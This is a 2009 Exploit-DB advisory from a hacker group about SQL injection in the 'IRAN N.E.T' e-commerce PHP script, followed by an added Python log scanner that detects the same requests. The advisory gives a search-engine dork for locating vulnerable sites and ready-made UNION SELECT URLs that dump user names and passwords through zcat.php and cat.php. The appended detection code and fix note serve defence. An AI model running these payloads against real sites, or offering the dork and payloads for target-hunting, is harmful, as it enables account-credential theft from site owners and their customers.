IRAN N.E.T E-Commerce Group - SQL Injection

EDB-ID: 10350
CVE: N/A
Platform: PHP
Date: 2009-12-08


                                                    ALGERIAN HACKER
    **********************- NORTH-AFRICA SECURITY TEAM -***********************

  [!]            IRAN N.E.T E-commerce Group SQL Injection Vulnerability
  [!] Author    : Dr.0rYX and Cr3w-DZ
  [!] MAIL      : vx3@hotmail.de  &  Cr3w@hotmail.de

  ***************************************************************************/

  [ Software Information ]

  [+] Vendor : http://iranmc.org
  [+] script   : IRAN N.E.T E-commerce Group SQL Injection Vulnerability
  [+] Download : http://iranmc.org/index.php?id=7 sell (script with hosting)
  [+] Vulnerability : SQL injection
  [+] Dork :inurl:"zcat.php?id="

  **************************************************************************/
  [ Vulnerable File ]

  http://server/zcat.php?id=[N.A.S.T ]

  [ Exploit ]

  http://server/zcat.php?id=-1+union+select+1,2,concat(user,char(58),pass),4,5+from+user


  http://server/cat.php?id=-3+union+select+1,group_concat(id,0x3a,user,0x3a,pass),3,4+from+user


  [ Example ]

  http://server/zcat.php?id=-64+union+select+1,2,concat%28user,char%2858%29,pass%29,4,5+from+user

  [  GReet ]

  [+] :xcv-dz , CLAW , LE0N , hacker.ps , exploit-db.com , ALL HACKERS MUSLIMS
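
A defender-side check for the request patterns above, as an added example that is not part of the original advisory: it scans web access logs for requests to zcat.php or cat.php whose id parameter is not a plain integer once URL-decoded, so the plus-encoded and percent-encoded forms are both caught. The log lines are constructed samples, and the combined-log layout and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines in combined-log style (assumed layout, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [08/Dec/2009:10:01:02 +0000] "GET /zcat.php?id=12 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [08/Dec/2009:10:02:11 +0000] "GET /zcat.php?id=-1+union+select+1,2,'
    'concat(user,char(58),pass),4,5+from+user HTTP/1.1" 200 734',
    '198.51.100.9 - - [08/Dec/2009:10:02:40 +0000] "GET /zcat.php?id=-64+union+select+1,2,'
    'concat%28user,char%2858%29,pass%29,4,5+from+user HTTP/1.1" 200 734',
    '198.51.100.9 - - [08/Dec/2009:10:03:05 +0000] "GET /cat.php?id=-3+union+select+1,'
    'group_concat(id,0x3a,user,0x3a,pass),3,4+from+user HTTP/1.1" 200 801',
    '203.0.113.4 - - [08/Dec/2009:10:04:00 +0000] "GET /index.php?id=7 HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
WATCHED_SCRIPTS = {"zcat.php", "cat.php"}   # the two files named in the advisory
SQL_WORDS = re.compile(r"\b(union|select|concat|group_concat|from)\b", re.IGNORECASE)


def classify_line(line):
    """Return (script, decoded_id, reason) for a suspicious request, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    script = url.path.rsplit("/", 1)[-1]
    if script not in WATCHED_SCRIPTS:
        return None
    # parse_qs undoes both '+' and %XX encoding, so both payload spellings decode alike.
    for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
        if re.fullmatch(r"[0-9]+", value):
            continue                      # plain integer id, nothing to report
        reason = "sql-keywords" if SQL_WORDS.search(value) else "non-numeric"
        return script, value, reason
    return None


def scan(lines):
    """Collect findings for every suspicious line."""
    return [hit for hit in map(classify_line, lines) if hit is not None]


if __name__ == "__main__":
    for script, value, reason in scan(SAMPLE_LOG):
        print(f"{reason:12} {script:9} id={value!r}")
```

The same integer-only rule is the fix on the application side: casting id to an integer or binding it as a query parameter leaves nothing for the UNION clause to attach to.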